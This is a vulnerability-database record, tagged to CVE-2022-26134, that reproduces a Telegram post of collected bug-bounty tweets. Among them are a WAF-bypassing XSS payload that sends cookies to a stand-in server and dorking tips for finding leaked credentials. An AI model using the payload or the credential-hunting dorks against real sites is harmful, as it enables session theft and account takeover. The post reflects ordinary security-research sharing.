{"uuid": "21498e2e-1b84-4dc8-83c4-5643cb422174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-26134", "type": "published-proof-of-concept", "source": "https://t.me/bhhub/790", "content": "#BugBountyTips of the Day\nYou should go through all of them once at least :)  #bugbounty  https://t.co/6D9ZsrbDGT\n---\nAPI testing is fun!  Breaking the stuffs by reading docs which were meant to be provided in order to actually build something.  More like, getting the blueprints of a ship and using it to find the weaknesses in the ship instead of building it.  #hacking #bugbounty\n---\n#bugbountytips #OSINT \ud83c\udf1f Find company's owned domains (company.*) with these #googledorks:  inurl:\" https://deliveroo\" intitle:deliveroo inurl:\" https://www.deliveroo\" intitle:deliveroo  Add findings, then append -site:TLD to the dork to find more, until you got them all!  #Hacking  https://t.co/QYpYw5fqfc\n---\nGithub Dorks are still one of my favorite techniques to use while Bug Bounty Hunting. Iv personally found email creds, FTP creds, AWS keys, and much more. Requires zero technical skill just persistence and luck.    https://t.co/tkhBJ72s7W   #bugbountytips #BugBounty #Pentesting\n---\nCRLFsuite - Fast CRLF Injection Scanning Tool  https://t.co/BlyIZimwHu #cybersecurity #bugbountytips #hacking #tools  https://t.co/zuYcqrWh4y\n---\nIf checking for exposed source code is not in your methodology, then you may be missing out! \ud83d\udc41\ufe0f\u200d\ud83d\udde8\ufe0f  Let this hint by @daffainfo help you out in that case, because exposed source code is a gold mine!  #bugbounty #bugbountytips \ud83d\udc47  https://t.co/NwdAwmGEgL\n---\n500-day streak yaaaay @RealTryHackMe  #CyberSecurity #informationsecurity #BugBounty  https://t.co/K2Far8OR4J\n---\nBest of Nmap Cheat Sheet  #infosec #cybersecurity #pentesting #oscp  #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness  https://t.co/wXYoBe497L\n---\nZed Attack Proxy Scripts for finding CVEs and Secrets. #cybersecurity @pdiscoveryio #bugbountytips   https://t.co/jcLURm8MVC\n---\nCVE-2022-26134: Atlassian Confluence RCE PoC  #BugBounty  https://t.co/7UFw7TkwME\n---\nNew Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover. As if you use document.location=URI (Blocked) but using location=`URI` (Bypassed)   &lt;/body&gt;&lt;body onControl anything hello onmouseenter=(location=`//yourserver.com?c=`%2bcookie) 1&gt; #bugbountytips\n---\nFirst bounty!\ud83c\udf89  Thanks @zseano and @BugBountyHunt3r team #hackerone #BugBounty  https://t.co/NpWZBpEHWL", "creation_timestamp": "2022-06-05T13:37:04.000000Z"}